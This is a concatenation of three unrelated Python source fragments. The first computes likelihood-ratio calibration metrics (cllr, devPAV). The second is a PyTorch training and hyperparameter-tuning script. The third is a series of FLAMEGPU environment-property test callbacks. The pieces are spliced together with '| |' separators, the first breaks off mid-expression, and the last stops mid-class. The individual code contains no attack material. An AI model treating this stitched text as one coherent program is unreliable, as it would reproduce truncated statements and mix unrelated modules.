y : a numpy array of labels (0 or 1)
Returns
-------
cllr
the log likelihood ratio cost
"""
# ignore errors:
# divide -> ignore divide by zero
# over -> ignore scalar overflow
with np.errstate(divide='ignore', over='ignore'):
lrs0, lrs1 = Xy_to_Xn(lrs, y)
cllr0 = weights[0] * np.mean(np.log2(1 + lrs0)) if weights[0] > 0 else 0
cllr1 = weights[1] * np.mean(np.log2(1 + 1 / lrs1)) if weights[1] > 0 else 0
return (cllr0 + cllr1) / sum(weights)
def cllr_min(lrs, y, weights=(1, 1)):
"""
Estimates the discriminative power from a collection of likelihood ratios.
Parameters
----------
lrs : a numpy array of LRs
y : a numpy array of labels (0 or 1)
Returns
-------
cllr_min
the log likelihood ratio cost
"""
cal = IsotonicCalibrator()
lrmin = cal.fit_transform(to_probability(lrs), y)
return cllr(lrmin, y, weights)
def devpav_estimated(lrs, y, resolution=1000):
"""
Estimate devPAV, a metric for calibration.
devPAV is the cumulative deviation of the PAV transformation from
the identity line. It is calculated in the LR range where misleading LRs
occur.
See also: <NAME>, Measuring calibration of likelihood ratio systems: a
comparison of four systems, including a new metric devPAV, to appear
This implementation estimates devPAV by calculating the average deviation
for a large number of LRs.
Parameters
----------
lrs : a numpy array of LRs
y : a numpy array of labels (0 or 1)
resolution : the number of measurements in the range of misleading evidence; a higher value yields a more accurate estimation
Returns
-------
devPAV
an estimation of devPAV
"""
lrs0, lrs1 = Xy_to_Xn(lrs, y)
if len(lrs0) == 0 or len(lrs1) == 0:
raise ValueError('devpav: illegal input: at least one value is required for each class')
# find misleading LR extremes
first_misleading = np.min(lrs1)
last_misleading = np.max(lrs0)
if first_misleading > last_misleading: # test for perfect discrimination
return 0
if np.isinf(first_misleading) or np.isinf(last_misleading): # test for infinitely misleading LRs
return np.inf
# calibrate on the input LRs
cal = IsotonicCalibrator()
cal.fit_transform(to_probability(lrs), y)
# take `resolution` points evenly divided along the range of misleading LRs
xlr = np.exp(np.linspace(np.log(first_misleading), np.log(last_misleading), resolution))
pavlr = cal.transform(to_probability(xlr))
devlr = np.absolute(np.log10(xlr) - np.log10(pavlr))
return (np.sum(devlr) / resolution) * (np.log10(last_misleading) - np.log10(first_misleading))
def calcsurface_f(c1, c2):
"""
Helperfunction that calculates the desired surface for two xy-coordinates
"""
# step 1: calculate intersection (xs, ys) of straight line through coordinates with identity line (if slope (a) = 1, there is no intersection and surface of this parrellogram is equal to deltaY * deltaX)
x1, y1 = c1
x2, y2 = c2
a = (y2 - y1) / (x2 - x1)
if a == 1:
# dan xs equals +/- Infinite en is er there is no intersection with the identity line
# since condition 1 holds the product below is always positive
surface = (y2 - y1) * (x2 - x1)
elif (a < 0):
raise ValueError(f"slope is negative; impossible for PAV-transform. Coordinates are {c1} and {c2}. Calculated slope is {a}")
else:
# than xs is finite:
b = y1 - a * x1
xs = b / (1 - a)
# xs
# step 2: check if intersection is located within line segment c1 and c2.
if x1 < xs and x2 >= xs:
# then intersection is within
# (situation 1 of 2) if y1 <= x1 than surface is:
if y1 <= x1:
surface = 0.5 * (xs - y1) * (xs - x1) - 0.5 * (xs - x1) * (xs - x1) + 0.5 * (y2 - xs) * (x2 - xs) - 0.5 * (
x2 - xs) * (x2 - xs)
else:
# (situation 2 of 2) than y1 > x1, and surface is:
surface = 0.5 * (xs - x1) ** 2 - 0.5 * (xs - y1) * (xs - x1) + 0.5 * (x2 - xs) ** 2 - 0.5 * (x2 - xs) * (
y2 - xs)
# dit is the same as 0.5 * (xs - x1) * (xs - y1) - 0.5 * (xs - y1) * (xs - y1) + 0.5 * (y2 - xs) * (x2 - xs) - 0.5 * (y2 - xs) * (y2 - xs) + 0.5 * (y1 - x1) * (y1 - x1) + 0.5 * (x2 - y2) * (x2 -y2)
else: # then intersection is not within line segment
# if (situation 1 of 4) y1 <= x1 AND y2 <= x1, and surface is
if y1 <= x1 and y2 <= x1:
surface = 0.5 * (y2 - y1) * (x2 - x1) + (x1 - y2) * (x2 - x1) + 0.5 * (x2 - x1) * (x2 - x1)
elif y1 > x1: # (situation 2 of 4) then y1 > x1, and surface is
surface = 0.5 * (x2 - x1) * (x2 - x1) + (y1 - x2) * (x2 - x1) + 0.5 * (y2 - y1) * (x2 - x1)
elif y1 <= x1 and y2 > x1: # (situation 3 of 4). This should be the last possibility.
surface = 0.5 * (y2 - y1) * (x2 - x1) - 0.5 * (y2 - x1) * (y2 - x1) + 0.5 * (x2 - y2) * (x2 - y2)
else:
# situation 4 of 4 : this situation should never appear. There is a fourth sibution as situation 3, but than above the identity line. However, this is impossible by definition of a PAV-transform (y2 > x1).
raise ValueError(f"unexpected coordinate combination: ({x1}, {y1}) and ({x2}, {y2})")
return surface
def _devpavcalculator(lrs, pav_lrs, y):
"""
function that calculates davPAV for a PAVresult for SSLRs and DSLRs een PAV transformatie de devPAV uitrekent
Input: Lrs = np.array met LR-waarden. pav_lrs = np.array met uitkomst van PAV-transformatie op lrs. y = np.array met labels (1 voor H1 en 0 voor H2)
Output: devPAV value
"""
DSLRs, SSLRs = Xy_to_Xn(lrs,y)
DSPAVLRs, SSPAVLRs = Xy_to_Xn(pav_lrs, y)
PAVresult = np.concatenate([SSPAVLRs, DSPAVLRs])
Xen = np.concatenate([SSLRs, DSLRs])
# order coordinates based on x's then y's and filtering out identical datapoints
data = np.unique(np.array([Xen, PAVresult]), axis=1)
Xen = data[0,:]
Yen = data[1,:]
# pathological cases
# check if min(Xen) = 0 or max(Xen) = Inf. First min(Xen)
# eerst van drie: als Xen[0] == 0 en Xen[len(Xen)-1] != Inf
if Xen[0] == 0 and Xen[-1] != np.inf:
if Yen[0] == 0 and Yen[1] != 0:
# dan loopt er een lijn in de PAV transform tot {inf, -Inf} evenwijdig aan de lijn y=x
return (np.absolute(np.log10(Xen[1]) - np.log10(Yen[1])))
else:
# dan is Yen[0] finite of Yen[1] gelijk 0 en loopt er ergens een horizontale lijn tot Log(Xen[0]) = -Inf. devPAV wordt oneindig
return np.inf
# tweede van drie: als Xen[len(Xen)-1] == Inf en Xen[0] != 0
elif Xen[0] != 0 and Xen[-1] == np.inf:
if Yen[len(Yen) - 1] == np.inf and Yen[len(Yen) - 2] != np.inf:
# dan loopt er een lijn in de PAV transform tot {inf, -Inf} evenwijdig aan de lijn y=x
return (np.absolute(np.log10(Xen[len(Xen) - 2]) - np.log10(Yen[len(Yen) - 2])))
else:
# dan is Yen[len(Yen] finite of Yen[len(Yen-2] gelijk inf en loopt er ergens een horizontale lijn tot Log(Xen[len(Xen)]) = Inf. devPAV wordt oneindig
return np.inf
# derde van drie: als Xen[0] = 0 en Xen[len(Xen)-1] == Inf
elif Xen[0] == 0 and Xen[-1] == np.inf:
if Yen[len(Yen) - 1] == np.inf and Yen[len(Yen) - 2] != np.inf and | |
# -*- coding: utf-8 -*-
"""Master training script"""
__author__ = "<NAME>"
__copyright__ = "MIT"
import datetime
import os
import sys
import random
import json
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
from torch.optim import SGD, Adam
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
from dtor.utilities.utils import focal_loss
from dtor.utilities.utils_stats import roc_and_auc
from dtor.utilities.torchutils import EarlyStopping
from dtor.utilities.torchutils import process_metrics, \
METRICS_LOSS_NDX, METRICS_LABEL_NDX, METRICS_PRED_NDX, METRICS_SIZE
from dtor.loss.sam import SAM
import joblib
import optuna
from optuna.samplers import TPESampler
from dtor.logconf import enumerate_with_estimate
from dtor.logconf import logging
from dtor.utilities.utils import find_folds, get_class_weights
from dtor.utilities.model_retriever import model_choice
from dtor.utilities.data_retriever import get_data
from dtor.opts import init_parser
from dtor.opts import norms
log = logging.getLogger(__name__)
# log.setLevel(logging.WARN)
log.setLevel(logging.INFO)
log.setLevel(logging.DEBUG)
class TrainerBase:
def __init__(self, sys_argv=None):
if sys_argv is None:
sys_argv = sys.argv[1:]
self.totalTrainingSamples_count = 0
self.model = None
self.weights = None
self.trn_writer = None
self.val_writer = None
self.optimizer = None
self.scheduler = None
self.train_dl = None
self.val_dl = None
self.study = None
self.sample = None
self.init_dict = {}
self.root_dir = os.environ["DTORROOT"]
parser = init_parser()
args = parser.parse_args(sys_argv)
if args.load_json:
with open(args.load_json, 'r') as f:
args.__dict__.update(json.load(f))
self.cli_args = args
if self.cli_args.best_json:
with open(self.cli_args.best_json, 'r') as f:
self.cli_args.__dict__.update(json.load(f))
self.use_cuda = torch.cuda.is_available()
self.device = torch.device("cuda" if self.use_cuda else "cpu")
# Needed to make training reproducible
self.reset_torch_seeds()
self.reset_rndm()
# Make all tunable hyperparameters members
self.patience = self.cli_args.earlystopping
self.fix_nlayers = self.cli_args.fix_nlayers
self.t_learnRate = self.cli_args.learnRate
self.t_decay = self.cli_args.decay
if "focal" in self.cli_args.loss.lower():
self.t_alpha = self.cli_args.focal_alpha
self.t_gamma = self.cli_args.focal_gamma
# Make results directory
self.output_dir = os.path.join("results", f"{self.cli_args.exp_name}-{self.cli_args.mode}")
def reset_torch_seeds(self):
seed_value = self.cli_args.seed
torch.manual_seed(seed_value)
if self.use_cuda:
torch.cuda.manual_seed(seed_value)
torch.cuda.manual_seed_all(seed_value)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
def reset_rndm(self):
seed_value = self.cli_args.seed
np.random.seed(seed_value)
random.seed(seed_value)
def init_model(self, sample=None):
return NotImplementedError
def init_data(self, fold, mean=None, std=None):
return NotImplementedError
def init_tune(self, train):
return NotImplementedError
def init_optimizer(self):
if self.cli_args.sam:
optim = SAM(self.model.parameters(), Adam, lr=self.t_learnRate)
else:
optim = Adam(self.model.parameters(), lr=self.t_learnRate)
decay = self.t_decay
scheduler = None
if decay < 1.0:
scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer=optim, gamma=decay, verbose=True)
return optim, scheduler
def init_loaders(self, train_ds, val_ds):
batch_size = self.cli_args.batch_size
if self.use_cuda:
batch_size *= torch.cuda.device_count()
train_dl = DataLoader(
train_ds,
batch_size=batch_size,
num_workers=self.cli_args.num_workers,
pin_memory=self.use_cuda,
)
val_dl = DataLoader(
val_ds,
batch_size=batch_size,
num_workers=self.cli_args.num_workers,
pin_memory=self.use_cuda,
)
return train_dl, val_dl
def init_tensorboard_writers(self, fold):
if self.trn_writer is None:
log_dir = os.path.join(self.output_dir, "logs")
self.trn_writer = SummaryWriter(
log_dir=f"{log_dir}-{fold}-trn_cls"
)
self.val_writer = SummaryWriter(
log_dir=f"{log_dir}-{fold}-val_cls"
)
def main(self):
# Make the output folder
assert not os.path.exists(self.output_dir), "Choose a unique experiment name or clean up after yourself :-)"
os.makedirs(self.output_dir)
log.info("Starting {}, {}".format(type(self).__name__, self.cli_args))
assert self.cli_args.mode in ["train", "tune"], "Only train or tune are allowed modes"
log.info(f"********** MODE = {self.cli_args.mode} *****************")
if self.cli_args.mode == "train":
self.main_training()
else:
self.tune()
def main_training(self):
# Load chunks file
_df = pd.read_csv(self.cli_args.datapoints, sep="\t")
if "fold_0" in _df.columns.values:
tot_folds = find_folds(_df)
log.info(f'Found a total of {tot_folds} folds to process')
else:
tot_folds = 1
for fold in range(tot_folds):
# Print
log.info(f'FOLD {fold}')
log.info('--------------------------------')
# Data
mean, std = norms[self.cli_args.norm]
train_ds, val_ds, train_dl, val_dl = self.init_data(fold, mean=mean, std=std)
# Get a sample batch
sample = []
for n, point in enumerate(train_dl):
if n == 1:
break
x = point[0]
sample.append(x)
sample = torch.cat(sample, dim=0)
# Generate weights
log.info('Calculating class weights')
self.weights = get_class_weights(train_ds)
self.weights = self.weights.to(self.device)
# Model
log.info('Initializing model')
self.model = self.init_model(sample=sample)
log.info('Model initialized')
self.totalTrainingSamples_count = 0
# Optimizer
self.optimizer, self.scheduler = self.init_optimizer()
log.info('Optimizer initialized')
# Early stopping class tracks the best validation loss
es = EarlyStopping(patience=self.patience)
# If model is using cnn_finetune, we need to update the transform with the new
# mean and std deviation values
try:
dpm = self.model if not self.use_cuda else self.model.module
except nn.modules.module.ModuleAttributeError:
dpm = self.model
if hasattr(dpm, "original_model_info"):
log.info('*******************USING PRETRAINED MODEL*********************')
mean = dpm.original_model_info.mean
std = dpm.original_model_info.std
train_ds, val_ds, train_dl, val_dl = self.init_data(fold, mean=mean, std=std)
log.info('*******************NORMALISATION DETAILS*********************')
log.info(f"preprocessing mean: {mean}, std: {std}")
# Training loop
for epoch_ndx in range(1, self.cli_args.epochs + 1):
log.info("FOLD {}, Epoch {} of {}, {}/{} batches of size {}*{}".format(
fold,
epoch_ndx,
self.cli_args.epochs,
len(train_dl),
len(val_dl),
self.cli_args.batch_size,
(torch.cuda.device_count() if self.use_cuda else 1),
))
trn_metrics_t = self.do_training(fold, epoch_ndx, train_dl)
self.log_metrics(fold, epoch_ndx, 'trn', trn_metrics_t)
val_metrics_t = self.do_validation(fold, epoch_ndx, val_dl)
self.log_metrics(fold, epoch_ndx, 'val', val_metrics_t)
# Checkpoint if it's the best model
val_loss = val_metrics_t[METRICS_LOSS_NDX].mean()
es(val_loss)
if val_loss < es.best_loss:
checkpoint = {
"EPOCH": epoch_ndx,
"model_state_dict": self.model.state_dict(),
"optimizer_state_dict": self.optimizer.state_dict(),
"LOSS": val_loss
}
ch_path = os.path.join(self.output_dir,
f"model-{self.cli_args.exp_name}-fold{fold}-epoch{epoch_ndx}.pth")
torch.save(checkpoint, ch_path)
obj, _, _ = roc_and_auc(val_metrics_t[METRICS_PRED_NDX].numpy(),
val_metrics_t[METRICS_LABEL_NDX].numpy())
log.info(f"Status AUC: {obj:.3f}")
if self.cli_args.earlystopping:
if es.early_stop:
break
model_path = os.path.join(self.output_dir,
f"model-{self.cli_args.exp_name}-fold{fold}.pth")
torch.save(self.model.state_dict(), model_path)
if hasattr(self, 'trn_writer'):
self.trn_writer.close()
self.val_writer.close()
self.trn_writer = None
self.val_writer = None
# Save CLI args
cli_name = os.path.join(self.output_dir, 'options.json')
with open(cli_name, 'w') as f:
json.dump(self.cli_args.__dict__, f, indent=2)
def do_training(self, fold, epoch_ndx, train_dl):
self.model = self.model.train().to(self.device)
trn_metrics_g = torch.zeros(
METRICS_SIZE,
len(train_dl.dataset),
device=self.device
)
batch_iter = enumerate_with_estimate(
train_dl,
"F{}, E{} Training".format(fold, epoch_ndx),
start_ndx=train_dl.num_workers,
)
for batch_ndx, batch_tup in batch_iter:
def closure():
self.optimizer.zero_grad()
loss_var = self.compute_batch_loss(
batch_ndx,
batch_tup,
train_dl.batch_size,
trn_metrics_g
)
loss_var.backward()
return loss_var
closure()
if self.cli_args.sam:
self.optimizer.step(closure)
else:
self.optimizer.step()
if self.scheduler:
self.scheduler.step()
self.totalTrainingSamples_count += len(train_dl.dataset)
return trn_metrics_g.to('cpu')
def do_validation(self, fold, epoch_ndx, val_dl):
with torch.no_grad():
self.model = self.model.eval()
val_metrics_g = torch.zeros(
METRICS_SIZE,
len(val_dl.dataset),
device=self.device,
)
batch_iter = enumerate_with_estimate(
val_dl,
"F{} E{} Validation ".format(fold, epoch_ndx),
start_ndx=val_dl.num_workers,
)
for batch_ndx, batch_tup in batch_iter:
self.compute_batch_loss(
batch_ndx, batch_tup, val_dl.batch_size, val_metrics_g, debug=False)
return val_metrics_g.to('cpu')
def compute_batch_loss(self, batch_ndx, batch_tup, batch_size, metrics_g, debug=False):
input_t, label_t, _ = batch_tup
input_g = input_t.to(self.device, non_blocking=True)
label_g = label_t.to(self.device, non_blocking=True)
input_g = input_g.float()
if self.cli_args.dim == 2:
logits_g = self.model(input_g)
probability_g = nn.Softmax(dim=1)(logits_g)
else:
logits_g, probability_g = self.model(input_g)
CE = nn.CrossEntropyLoss(reduction='none', weight = self.weights)
if "focal" in self.cli_args.loss.lower():
loss_g = focal_loss(CE(logits_g, label_g), label_g, self.t_gamma, self.t_alpha)
else:
loss_g = CE(logits_g, label_g)
start_ndx = batch_ndx * batch_size
end_ndx = start_ndx + label_t.size(0)
metrics_g[METRICS_LABEL_NDX, start_ndx:end_ndx] = label_g.detach()
metrics_g[METRICS_PRED_NDX, start_ndx:end_ndx] = probability_g[:, 1].detach()
metrics_g[METRICS_LOSS_NDX, start_ndx:end_ndx] = loss_g.detach()
if debug:
print(logits_g)
print(label_g)
print(probability_g[:, 1])
print(loss_g)
print("***")
return loss_g.mean()
def log_metrics(
self,
fold,
epoch_ndx,
mode_str,
metrics_t,
classification_threshold=0.5,
):
self.init_tensorboard_writers(fold)
log.info("F{} E{} {}".format(
fold,
epoch_ndx,
type(self).__name__,
))
metrics_dict = process_metrics(metrics_t, classification_threshold)
log.info(
("F{} E{} {:8} {loss/all:.4f} loss, "
+ "{correct/all:-5.1f}% correct, "
).format(
fold,
epoch_ndx,
mode_str,
**metrics_dict,
)
)
log.info(
("F{} E{} {:8} {loss/neg:.4f} loss, "
+ "{correct/neg:-5.1f}% correct ({neg_correct:} of {neg_count:})"
).format(
fold,
epoch_ndx,
mode_str + '_neg',
**metrics_dict,
)
)
log.info(
("F{} E{} {:8} {loss/pos:.4f} loss, "
+ "{correct/pos:-5.1f}% correct ({pos_correct:} of {pos_count:})"
).format(
fold,
epoch_ndx,
mode_str + '_pos',
**metrics_dict,
)
)
writer = getattr(self, mode_str + '_writer')
for key, value in metrics_dict.items():
if type(value) is float or type(value) is int:
writer.add_scalar(key, value, self.totalTrainingSamples_count)
writer.add_pr_curve(
'pr',
metrics_t[METRICS_LABEL_NDX],
metrics_t[METRICS_PRED_NDX],
self.totalTrainingSamples_count,
)
bins = [x / 50.0 for x in range(51)]
neg_hist_mask = metrics_dict['neg_label_mask'] & (metrics_t[METRICS_PRED_NDX] > 0.01)
pos_hist_mask = metrics_dict['pos_label_mask'] & (metrics_t[METRICS_PRED_NDX] < 0.99)
if neg_hist_mask.any():
writer.add_histogram(
'is_neg',
metrics_t[METRICS_PRED_NDX, neg_hist_mask],
self.totalTrainingSamples_count,
bins=bins,
)
if pos_hist_mask.any():
writer.add_histogram(
'is_pos',
metrics_t[METRICS_PRED_NDX, pos_hist_mask],
self.totalTrainingSamples_count,
bins=bins,
)
def tune_train(self, trial):
# Save the study status
joblib.dump(self.study, os.path.join(self.output_dir, 'tuning_study.pkl'))
# Initialize tuneable params
self.init_tune(trial)
# Model initialisation
#if self.fix_nlayers:
self.model = self.init_model(sample=self.sample)
# Save the initial state to reproduce the tuning value
model_path = os.path.join(self.output_dir,
f"model_init_{trial.number}.pth")
torch.save(self.model.state_dict(), model_path)
self.init_dict[trial.number] = model_path
# If model is using cnn_finetune, we need to update the transform with the new
# mean and std deviation values
try:
dpm = self.model if not self.use_cuda else self.model.module
except nn.modules.module.ModuleAttributeError:
dpm = self.model
if hasattr(dpm, "original_model_info"):
log.info('*******************USING PRETRAINED MODEL*********************')
mean = dpm.original_model_info.mean
std = dpm.original_model_info.std
train_ds, val_ds, self.train_dl, self.val_dl = self.init_data(0, mean=mean, std=std)
# Optimizer
self.optimizer, self.scheduler = self.init_optimizer()
log.info('Optimizer initialized')
# Early stopping class tracks the best validation loss
es = EarlyStopping(patience=self.patience)
# Training loop
val_metrics_t = None
for epoch_ndx in range(1, self.cli_args.epochs + 1):
trn_metrics_t = self.do_training(0, epoch_ndx, self.train_dl)
self.log_metrics(0, epoch_ndx, 'trn', trn_metrics_t)
val_metrics_t = self.do_validation(0, epoch_ndx, self.val_dl)
self.log_metrics(0, epoch_ndx, 'val', val_metrics_t)
val_loss = val_metrics_t[METRICS_LOSS_NDX].mean()
es(val_loss)
if self.cli_args.earlystopping:
if es.early_stop:
break
try:
obj, _, _ = roc_and_auc(val_metrics_t[METRICS_PRED_NDX].numpy(),
val_metrics_t[METRICS_LABEL_NDX].numpy())
except ValueError:
return None
log.info(f"Calculated objective: {obj:.3f}")
return - obj
def tune(self):
log.info('Initializing model and data')
# Data
mean, std = norms[self.cli_args.norm]
train_ds, val_ds, self.train_dl, self.val_dl = self.init_data(0, mean=mean, std=std)
# Get a sample batch
sample = []
for n, point in enumerate(self.train_dl):
if n == 1:
break
x = point[0]
sample.append(x)
self.sample = torch.cat(sample, dim=0)
# Generate weights
self.weights = get_class_weights(train_ds)
self.weights = self.weights.to(self.device)
| |
= MiniSim.make_array()
assert self.set_uint8_a == init1[TEST_ARRAY_LEN - 1]
assert self.get_uint8_a == TEST_VALUE * 2
class get_set_array_element_int16(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
self.set_int16_a = FLAMEGPU.environment.setPropertyInt16("int16_a_", TEST_ARRAY_LEN - 1, TEST_VALUE * 2)
self.get_int16_a = FLAMEGPU.environment.getPropertyInt16("int16_a_", TEST_ARRAY_LEN - 1)
FLAMEGPU.environment.setPropertyInt16("int16_a_", TEST_ARRAY_LEN - 1, init1[TEST_ARRAY_LEN - 1])
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.set_int16_a == init1[TEST_ARRAY_LEN - 1]
assert self.get_int16_a == TEST_VALUE * 2
class get_set_array_element_uint16(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
self.set_uint16_a = FLAMEGPU.environment.setPropertyUInt16("uint16_a_", TEST_ARRAY_LEN - 1, TEST_VALUE * 2)
self.get_uint16_a = FLAMEGPU.environment.getPropertyUInt16("uint16_a_", TEST_ARRAY_LEN - 1)
FLAMEGPU.environment.setPropertyUInt16("uint16_a_", TEST_ARRAY_LEN - 1, init1[TEST_ARRAY_LEN - 1])
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.set_uint16_a == init1[TEST_ARRAY_LEN - 1]
assert self.get_uint16_a == TEST_VALUE * 2
class get_set_array_element_int32(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
self.set_int32_a = FLAMEGPU.environment.setPropertyInt32("int32_a_", TEST_ARRAY_LEN - 1, TEST_VALUE * 2)
self.get_int32_a = FLAMEGPU.environment.getPropertyInt32("int32_a_", TEST_ARRAY_LEN - 1)
FLAMEGPU.environment.setPropertyInt32("int32_a_", TEST_ARRAY_LEN - 1, init1[TEST_ARRAY_LEN - 1])
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.set_int32_a == init1[TEST_ARRAY_LEN - 1]
assert self.get_int32_a == TEST_VALUE * 2
class get_set_array_element_uint32(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
self.set_uint32_a = FLAMEGPU.environment.setPropertyUInt32("uint32_a_", TEST_ARRAY_LEN - 1, TEST_VALUE * 2)
self.get_uint32_a = FLAMEGPU.environment.getPropertyUInt32("uint32_a_", TEST_ARRAY_LEN - 1)
FLAMEGPU.environment.setPropertyUInt32("uint32_a_", TEST_ARRAY_LEN - 1, init1[TEST_ARRAY_LEN - 1])
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.set_uint32_a == init1[TEST_ARRAY_LEN - 1]
assert self.get_uint32_a == TEST_VALUE * 2
class get_set_array_element_int64(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
self.set_int64_a = FLAMEGPU.environment.setPropertyInt64("int64_a_", TEST_ARRAY_LEN - 1, TEST_VALUE * 2)
self.get_int64_a = FLAMEGPU.environment.getPropertyInt64("int64_a_", TEST_ARRAY_LEN - 1)
FLAMEGPU.environment.setPropertyInt64("int64_a_", TEST_ARRAY_LEN - 1, init1[TEST_ARRAY_LEN - 1])
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.set_int64_a == init1[TEST_ARRAY_LEN - 1]
assert self.get_int64_a == TEST_VALUE * 2
class get_set_array_element_uint64(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
self.set_uint64_a = FLAMEGPU.environment.setPropertyUInt64("uint64_a_", TEST_ARRAY_LEN - 1, TEST_VALUE * 2)
self.get_uint64_a = FLAMEGPU.environment.getPropertyUInt64("uint64_a_", TEST_ARRAY_LEN - 1)
FLAMEGPU.environment.setPropertyUInt64("uint64_a_", TEST_ARRAY_LEN - 1, init1[TEST_ARRAY_LEN - 1])
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.set_uint64_a == init1[TEST_ARRAY_LEN - 1]
assert self.get_uint64_a == TEST_VALUE * 2
# Exception ProprtyType
class exception_property_type_float(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
try:
FLAMEGPU.environment.setPropertyUInt64("float_", TEST_VALUE)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayUInt64("float_", init1)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.e1 == "InvalidEnvPropertyType"
assert self.e2 == "InvalidEnvPropertyType"
class exception_property_type_double(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
try:
FLAMEGPU.environment.setPropertyUInt64("double_", TEST_VALUE)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayUInt64("double_", init1)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.e1 == "InvalidEnvPropertyType"
assert self.e2 == "InvalidEnvPropertyType"
class exception_property_type_int8(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
try:
FLAMEGPU.environment.setPropertyUInt64("int8_", TEST_VALUE)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayUInt64("int8_", init1)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.e1 == "InvalidEnvPropertyType"
assert self.e2 == "InvalidEnvPropertyType"
class exception_property_type_uint8(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
try:
FLAMEGPU.environment.setPropertyUInt64("uint8_", TEST_VALUE)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayUInt64("uint8_", init1)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.e1 == "InvalidEnvPropertyType"
assert self.e2 == "InvalidEnvPropertyType"
class exception_property_type_int16(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
try:
FLAMEGPU.environment.setPropertyUInt64("int16_", TEST_VALUE)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayUInt64("int16_", init1)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.e1 == "InvalidEnvPropertyType"
assert self.e2 == "InvalidEnvPropertyType"
class exception_property_type_uint16(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
try:
FLAMEGPU.environment.setPropertyUInt64("uint16_", TEST_VALUE)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayUInt64("uint16_", init1)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.e1 == "InvalidEnvPropertyType"
assert self.e2 == "InvalidEnvPropertyType"
class exception_property_type_int32(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
try:
FLAMEGPU.environment.setPropertyUInt64("int32_", TEST_VALUE)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayUInt64("int32_", init1)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.e1 == "InvalidEnvPropertyType"
assert self.e2 == "InvalidEnvPropertyType"
class exception_property_type_uint32(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
try:
FLAMEGPU.environment.setPropertyUInt64("uint32_", TEST_VALUE)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayUInt64("uint32_", init1)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.e1 == "InvalidEnvPropertyType"
assert self.e2 == "InvalidEnvPropertyType"
class exception_property_type_int64(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
try:
FLAMEGPU.environment.setPropertyFloat("int64_", TEST_VALUE)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayFloat("int64_", init1)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.e1 == "InvalidEnvPropertyType"
assert self.e2 == "InvalidEnvPropertyType"
class exception_property_type_uint64(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
try:
